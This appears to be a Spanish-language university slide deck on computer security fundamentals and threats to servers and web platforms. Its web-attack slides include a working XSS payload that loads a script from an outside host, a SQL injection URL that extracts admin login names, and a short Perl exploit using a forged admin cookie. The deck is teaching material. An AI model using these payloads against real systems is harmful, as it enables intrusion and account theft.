auditoria

Universidad Mariano Gálvez de Guatemala

Auditoria de Sistemas

Seguridad Informática

- Fundamentos de la seguridad informática

- Seguridad en ambiente de servidores

-

- Seguridad en plataformas Web

- Cómo proteger las redes Wi-Fi

- Recomendaciones generales para Internet

Seguridad Informática
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA



CONFIDENCIALIDAD

INTEGRIDAD



DISPONIBILIDAD



AUTENTICIDAD

Seguridad Informática
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA

No existe la absoluta seguridad !!
Todo es rompible si se le aplica fuerza. Una caja de vidrio
se puede romper, pero también una caja fuerte de titanio.
¿Qué es más seguro: la caja de vidrio o la de titanio?
Evidentemente la de titanio, pero esto dependesolamente
de que herramienta utilicemos para romperla.
Todo se puede vulnerar. La única razón por la cual
utilizamos rejas de fierros en nuestras casas y los bancos
es porque hace que el ataque sea más lento.

Seguridad Informática
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA

Entonces, ¿Cómo nos protegemos de la forma más
eficiente posible?

Determinando que queremos proteger (ej:Hardware,
datos privados, datos públicos, sistemas, etc)‫‏‬
 Estableciendo prioridades de los factores a proteger
 Formando políticas de seguridad
 Manteniendo la seguridad en el tiempo


Seguridad Informática
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA

Debemos enfocarnos en REDUCIR EL RIESGO, y no en
tratar de eliminar las amenazas, ya que es imposible.

Para eso debemos saber de QUEo QUIENES nos
protegemos y también COMO nos atacan.

Seguridad Informática
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Seguridad Informática
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Ataques Internos
- Premeditación (Empleados mal intencionados o ex empleados con
información privilegiada)‫‏‬
- Descuido
- Ignorancia
- Indiferencia de las politicas deseguridad

Ataques externos
- Hackers, Crackers, Lammers, Script-Kiddies
-- Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test),
etc.
-

http://www.seguridad-informatica.cl

Seguridad Informática
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Ataques Internos
Suplantación de identidad
• Sniffing (Incluso administradores pueden hacer sniffing.
Sugerencia:CIFRAR)‫‏‬
• Robo de información (Ej: para la competencia)‫‏‬
• Virus, Troyanos, Gusanos
• Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc
Keylogging - Keycatching
•

Keycatcher:

Seguridad Informática
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

Ataques Externos
Ataques contra servicios WEB
• Cross Site Scripting (XSS)‫‏‬
• SQL Injection
• Exploits
• Robo deIdentidad
• Denegación de Servicio (DoS) y Denegación de Servicio
Distribuido (DDoS)‫‏‬
• SPAM
• VIRUS
• Phishing (Whishing, Hishing)‫‏‬
• Troyanos
•

Seguridad Informática
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

XSS

Seguridad Informática
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

XSS:
http://docs.info.apple.com/article.html?artnum=';a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendC
hild(a);//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E

SQL Injection:
http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT
TOP 1 login_name FROM admin_login--

Seguridad Informática
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Ejemplo de un exploit en PERL:
#!/usr/bin/perl
use LWP::UserAgent;
useHTTP::Cookies;
$host=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl \n";
exit;
}
my $browser = LWP::UserAgent->new();
my $resp = $browser->get("http://$host/admin/wg_userinfo.ml","Cookie","USER_ID=0; path=/;");
$t = $resp->content;
#print $t;
";

Seguridad Informática
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
CONVIRTIENDO NUESTROS SERVICIOS EN FORTALEZAS

Seguridad...